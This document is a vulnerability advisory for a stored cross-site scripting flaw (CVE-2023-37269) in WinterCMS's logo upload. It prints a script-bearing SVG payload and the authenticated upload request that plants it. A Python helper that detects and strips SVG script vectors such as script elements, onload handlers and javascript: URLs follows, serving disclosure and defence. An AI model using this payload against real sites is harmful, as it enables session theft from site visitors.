# Exploit Title: Wintercms 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: Abhishek Morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: Windows 64-bit / Mozilla Firefox
# CVE: CVE-2023-37269
# Report Link: https://github.com/wintercms/winter/security/advisories/ghsa-wjw2-4j7j-6gc3
# Video PoC:
Title: The application is vulnerable to persistent cross-site scripting through SVG file upload in the custom logo upload feature
Description:
WinterCMS does not restrict SVG files from being uploaded as the site logo through the backend branding settings, which leaves it open to persistent (stored) cross-site scripting. An attacker with a backend login that is allowed to change the branding settings uploads an SVG that embeds JavaScript; the logo is then served to every user, including anonymous visitors, so any visit to a page that renders the uploaded file can trigger the script in that user's browser. (The title refers to 1.2.3 while the Version field above lists 1.2.2; consult the linked advisory for the exact affected range.) Note that browsers do not execute script inside an SVG that is loaded through an <img> tag; the script runs when the uploaded file is opened directly from the site's origin or embedded with <object>/<iframe>, so check how the logo URL is actually referenced when assessing impact.
Payload:
// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
// POST request (the admin_auth and winter_session cookie values are the tester's own authenticated session and are replaced with placeholders here)
POST /backend/system/settings/update/winter/backend/brand HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: FK93D30VMHCAWWGMLTRY97VPOXAF4IPPHTUWIOC2
X-Winter-Request-Handler: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=<admin_auth session cookie>; bblang=en_us; winter_session=<winter_session cookie>

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
-----------------------------186411693022341939203410401206--
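Defensive check to go with this advisory: the helper below is an added example written for this page, not WinterCMS code and not the advisory author's. It reparses an uploaded SVG and reports the script vectors that matter for a logo file: <script> and other embedding elements, on* event-handler attributes, and javascript: URLs, including ones hidden in the values list of an <animate>/<set> element. A second function strips those parts for deployments that must accept the file anyway. The sample SVGs are constructed inline; the malicious one is the advisory's payload with the alert on document.domain.

```python
"""Reject or neutralise active content in an uploaded SVG before it is stored
as a site logo.

Added example for this advisory; hypothetical helper, not WinterCMS code.
Uses only the Python standard library (xml.etree.ElementTree).
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that execute script or embed arbitrary HTML inside an SVG document.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

# A script-scheme URL, also when it appears later in a ';'-separated
# "values" list used by <animate>/<set> to rewrite an href at runtime.
SCRIPT_SCHEME_RE = re.compile(r"(?:^|;)\s*(?:javascript|vbscript)\s*:", re.IGNORECASE)

# Constructed sample: the advisory's payload (a triangle plus a <script>).
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert(document.domain);</script>
</svg>"""

# Constructed sample: the same shape without the script element.
BENIGN_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed samples of the other common SVG script vectors.
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><circle r="5"/></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text y="10">click</text></a></svg>')


def _local(qname):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def _attr_is_dangerous(name, value):
    """True for on* event handlers and for any value carrying a script-scheme URL."""
    local = _local(name).lower()
    return local.startswith("on") or bool(SCRIPT_SCHEME_RE.search(value))


def find_active_content(svg_bytes):
    """Return a list of findings; an empty list means no active content was seen.

    Raises xml.etree.ElementTree.ParseError on malformed input, which an upload
    handler should treat as a rejection as well.
    """
    findings = []
    for elem in ET.fromstring(svg_bytes).iter():
        tag = _local(elem.tag).lower()
        if tag in DANGEROUS_ELEMENTS:
            findings.append("element <%s>" % tag)
        for name, value in elem.attrib.items():
            if _attr_is_dangerous(name, value):
                findings.append("attribute %s on <%s>" % (_local(name), tag))
    return findings


def strip_active_content(svg_bytes):
    """Return the SVG with dangerous elements and attributes removed.

    Prefer rejecting the upload outright (find_active_content); stripping is
    for cases where the logo must be accepted. The DOCTYPE and comments are
    dropped by the round trip through ElementTree.
    """
    root = ET.fromstring(svg_bytes)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for elem in list(root.iter()):
        if _local(elem.tag).lower() in DANGEROUS_ELEMENTS and elem in parent_of:
            parent_of[elem].remove(elem)
            continue
        for name in list(elem.attrib):
            if _attr_is_dangerous(name, elem.attrib[name]):
                del elem.attrib[name]
    ET.register_namespace("", SVG_NS)      # keep svg as the default namespace
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


if __name__ == "__main__":
    for label, data in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG),
                        ("onload", ONLOAD_SVG), ("href", HREF_SVG)):
        print(label, find_active_content(data) or "clean")
    print(strip_active_content(MALICIOUS_SVG).decode())
```

Two caveats for production use: the stdlib parser does not fetch the external DTD, but it is still exposed to entity-expansion bombs, so parse untrusted uploads with defusedxml or with a size cap; and a blocklist like this only covers the vectors listed, so the simplest fix for a logo field is to refuse image/svg+xml altogether (or rasterize the upload) and, where SVG must be kept, to reject on any finding rather than strip.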